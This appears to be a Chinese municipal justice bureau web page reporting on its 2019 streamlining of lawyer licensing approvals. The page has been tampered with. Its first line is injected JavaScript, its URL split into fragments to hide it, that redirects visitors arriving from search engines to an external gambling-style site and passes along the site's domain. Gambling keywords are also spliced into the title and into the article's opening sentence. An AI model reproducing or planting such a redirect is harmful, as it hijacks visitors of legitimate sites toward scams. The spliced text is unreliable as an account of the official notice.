var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 律师管理·公证管理
发布日期:2019-10-16 浏览次数: 字号:[ ]

今年以来,bbin宝盈,bbin下载:司法局围绕打造最佳营商法律服务环境为目标,不断深化律师审批“最多跑一次”改革,认真落实“马上办、网上办、就近办、一次办”要求,梳理细化行政审批流程和审查责任,进一步精简办事材料、拓展服务形式、提高服务成效,推动“最多跑一次”改革向纵深发展。截至目前,全市共受理各类律师审批(初审)事项276件,所有事项在承诺时限内按时办结率达100%,实现办件“零差错”、服务“零投诉”。  

一是申报材料再精简。根据省厅“八统一”标准,明确了每个事项办事指南、申请表单、材料样本等信息内容的合法、完整、准确、及时、有效,并依法减少和规范申请材料。由市局律管处重新梳理出涉及律师律所类审批事项共计6个主项,19个子项,实现了上述行政审批事项“最多跑一次”的全覆盖。取消律师执业事项 “申请人的执业经历证明”、律师事务所年度考核 “年度财务审计报告”等20项证明材料,改为通过申请人书面承诺,政府部门调查或者内部核查、网络核验等方式办理。  

二是审批事项再下放。积极配合上级部门快推进职能转变,加大简政放权力度,根据省司法厅通知要求,从今年10月份起,将律师执业机构变更登记、律师事务所(包括分所)负责人变更登记、律师事务所章程(组织形式不变)变更登记、律师事务所合伙协议变更登记、律师事务所合伙人和住所变更备案、律师事务所派驻分所律师和撤回派驻分所律师备案共6大类的许可审批、备案事项委托下放,由市司法局代为行使,市司法局对委托工作承接前准备、承接后审批工作具体分工等方面进行研究部署并作出详细安排。  

三是服务效能再优化。落实“网上申请、现场受理、证照快递送达”模式,全面推行申请材料不全“容缺受理”工作机制,在全市各类律师审批事项中推出免费“快递送证”服务,经当事人同意,审批服务事项办结后通过邮政EMS免费寄送证件,让“快递跑”替代“群众跑”,今年以来,通过快递送达许可决定书和证件等文书材料累积260件。同时,为避免“跑空趟”、“往返跑”, 在实习律师考核时同步下发各类律师审批事项的法律依据、办理条件、办理流程图、办理程序、办理材料等要求,落实“一次性告知制度”,不跑冤枉路,实现律师审批“最多跑一次”落地。

市局律师工作处




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统